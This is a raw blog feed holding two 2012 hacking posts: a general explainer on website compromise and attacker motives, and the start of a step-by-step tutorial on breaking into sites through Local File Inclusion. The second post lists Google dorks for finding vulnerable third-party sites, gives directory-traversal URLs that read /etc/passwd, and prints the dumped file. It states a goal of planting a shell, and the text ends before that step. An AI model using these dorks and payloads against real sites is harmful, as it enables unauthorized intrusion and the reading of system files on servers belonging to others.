&lt;a href="http://1.bp.blogspot.com/-A0p25c1OKLA/UIE07703MrI/AAAAAAAAAPk/Vl7uqTTSPJM/s1600/XSS-web-hacking.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://1.bp.blogspot.com/-A0p25c1OKLA/UIE07703MrI/AAAAAAAAAPk/Vl7uqTTSPJM/s320/XSS-web-hacking.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;&amp;nbsp;Hack Website : Basic Information About Website Hacking Part 1&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Well I have posted lots of articles on Email Hacking which includes Phishing and keylogging etc, but today I would like to throw some light on new topic which is "Website Hacking". Today i am first time writing article on "Website Hacking". why I am writing this article as there are lots of newbies having lots of misconceptions related hacking website, So I hope this tutorial cover all those misconception and if not all most of them.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available such as SQL Injection through which even a newbie can find a vulnerable site and start Hacking in just few minutes.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Basic Information About Website Hacking&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-XL0LY9OHtVo/UIE1JWrRHqI/AAAAAAAAAPs/0DcokRR_RPU/s1600/Basic-Website.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-XL0LY9OHtVo/UIE1JWrRHqI/AAAAAAAAAPs/0DcokRR_RPU/s320/Basic-Website.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;What is a website hack?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-5Nk5otvVeeQ/UIE1Two4ZoI/AAAAAAAAAP0/CIQd0NRCtlM/s1600/who-hacker.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-5Nk5otvVeeQ/UIE1Two4ZoI/AAAAAAAAAP0/CIQd0NRCtlM/s1600/who-hacker.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Who are the hackers?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Why do they do it? What do they want?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because their methods are illegal!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;To use your server to make money, in approximate order of decreasing value and decreasing incidence of occurrence, they want:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Theft methods:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: #38761d;"&gt;They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;They copy your customer database.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: #38761d;"&gt;They install spyware or phishing pages in your site, to grab data as your customers log in.&amp;nbsp;Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Your mail server, for sending spam.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; Free use of your server's processing power, to reprogram however they want.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; Examples:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Illegal pornographic content.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: #38761d;"&gt; Use your&amp;nbsp;web space&amp;nbsp;to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Common Methods used for Website Hacking&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;There are lots of methods that can be used to hack a website but most common ones are as follows:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;SQL Injection&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Cross Site Scripting (XSS)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Remote File Inclusion(RFI)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Local File inclusion(LFI)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Directory Traversal&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Cross-site request forgery( CSRF )&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; SSI Injection&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; LDAP Injection&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; XPath Injection&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Denial of Service - DOS Attacks&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;In this article, I have just shared basic information on Hacking Website. I hope you have liked the post uptill now, I will cover the method to hack website in the next post, So stay tuned !.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;center&gt;
&lt;b&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Remember Hacking Is Crime.This tutorial is Educational purpose only'); return true" type="button" value="Remember" /&gt;
&lt;/form&gt;
&lt;/b&gt;&lt;/center&gt;
&lt;b&gt;
&lt;!-- End of Message Alert --&gt;&lt;/b&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/5957241577132076163/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=5957241577132076163&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/5957241577132076163?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/5957241577132076163?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/basic-ethical-hacking-part-1.html' title='Basic Ethical  Hacking part 1'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-A0p25c1OKLA/UIE07703MrI/AAAAAAAAAPk/Vl7uqTTSPJM/s72-c/XSS-web-hacking.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;AkUEQHk9fyp7ImA9WhNTFUU.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-7688265163019223885</id><published>2012-10-19T01:23:00.000+06:00</published><updated>2012-10-19T01:23:21.767+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-19T01:23:21.767+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='web Site Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Web Devolopment'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>Web site Hacking by Local File Inclusion (LFI)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-53bt2rYvRXQ/UIBW_KVdDSI/AAAAAAAAAPQ/NcUkp6ZIy0g/s1600/lfi.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-53bt2rYvRXQ/UIBW_KVdDSI/AAAAAAAAAPQ/NcUkp6ZIy0g/s320/lfi.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;In previous article we have discussed various website hacking tutorials like..How to find a vulnerable Website?, Basic information of website hacking, XSS Tutorial , (CSRF/XSRF) and Remote File Inclusion Tutorial.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;In this tutorial I show you how to get a shell on websites using Local File Inclusion (LFI) vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;How To Hack Website Using Local File Inclusion(LFI)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Follow the following steps to hack website using LFI and upload shell on hacked website.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 1:&lt;/span&gt;&lt;span style="color: #38761d;"&gt; Search For LFI vulnerable Sites?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Now we are going to find a Local File Inclusion vulnerable website using some Dorks.Search that Dorks in google, to get LFI vulnerable Sites.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;inurl:redirect.php?page=&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; inurl:/include/new-visitor.inc.php?lvc_include_dir=&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; inurl:/_functions.php?prefix=&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; inurl:/cpcommerce/_functions.php?prefix=&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;For more Dorks Visit here&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Here i am using following google dork:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; inurl:redirect.php?page=&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Search that in google, and you should come up with a link like this:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; www.website.com/view.php?page=contact.php&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 2:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Test Local File Inclusion vulnerability&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Now lets replace&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: magenta;"&gt;contact.php&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;with&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: magenta;"&gt;../&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;so the URL will become&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;www.website.com/view.php?page=../&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;and we got an error&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;b&gt;&lt;span style="color: #cc0000;"&gt;&amp;nbsp; Warning:&lt;/span&gt;&lt;span style="color: magenta;"&gt; include(../) [function.include]:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;failed to open stream: No such file or directory in &lt;/span&gt;&lt;/b&gt;&lt;span style="color: magenta;"&gt;&lt;b&gt;/home/sirgod/public_html/website.com/view.php&lt;/b&gt;&lt;/span&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;on line&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: magenta;"&gt;1337&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Big chances to have a Local File Inclusion vulnerability.Let’s go to next step.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp;www.website.com/view.php?page=../../../etc/passwd&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;We got error and no etc/passwd file&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: #cc0000;"&gt;Warning:&lt;/span&gt;&lt;span style="color: magenta;"&gt; include(../) [function.include]:&lt;/span&gt;&lt;/b&gt; f&lt;b&gt;&lt;span style="color: #38761d;"&gt;ailed to open stream: No such file or directory in &lt;/span&gt;&lt;span style="color: magenta;"&gt;/home/sirgod/public_html/website.com/view.php on line 1337&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;so we go more directories up&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; www.website.com/view.php?page=../../../../../etc/passwd&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;we&amp;nbsp;successfully&amp;nbsp;included the etc/passwd file.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Note :well if Local File Inclusion vulnerable site url is,&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; www.site.com/test.php?main=lol.php&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;that means,&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; PHP Code:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; include $main;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;so you cant go with it with any nullbyte&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
